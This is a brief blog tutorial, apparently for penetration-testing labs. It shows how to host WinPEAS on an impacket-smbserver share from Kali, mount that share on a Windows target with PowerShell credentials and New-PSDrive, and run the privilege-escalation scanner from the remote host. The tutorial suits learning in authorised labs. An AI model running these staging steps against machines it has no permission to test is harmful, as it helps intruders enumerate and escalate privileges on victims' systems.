This time we will set a SMB server to run script from using impaket-smbserver

https://github.com/SecureAuthCorp/impacket

Download

1. Download the scripts

  • git clone https://github.com/SecureAuthCorp/impacket.git

2. locate the smbserver script

  • find . -iname *smbserver* 2> /dev/null

Note: I already have it installed in my Kali machine

How to

1. In your Linux machine locate the folder where the script is placed, in this case we will use WinPEAS

  • cd ../Documents/Tools/privilege-escalation-awesome-scripts-suite/winPEAS/winPEASexe/binaries/x64/Release

2. Being there now run the smb server

  • impacket-smbserver smbfolder $(pwd) -smb2support -user vk9guest -password vk9pass

3. At the Windows server, using Powershell run

  • $pass = ConvertTo-SecureString ‘vk9pass’ -AsPlainText -Force
  • $pass
  • $cred = New-Object System.Management.Automation.PSCredential(‘vk9guest’, $pass)
  • $cred

4. Having the credentials already set, we will proceed to connect to the SMB server

  • New-PSDrive -Name vk9smb -PSProvider FileSystem -Credential $cred -Root \\10.10.14.13\smbfolder

5. Now access the share that has been mounted

  • cd vk9smb:
  • dir

6. Execute the program

  • .\winPEASx64.exe

7. If you need to mount multiple times use only a different name

  • New-PSDrive -Name vk9smb -PSProvider FileSystem -Credential $cred -Root \\10.10.14.13\smbfolder
  • New-PSDrive -Name vk9smb2 -PSProvider FileSystem -Credential $cred -Root \\10.10.14.13\smbfolder

 


0 Comments

Leave a Reply

Your email address will not be published. Required fields are marked *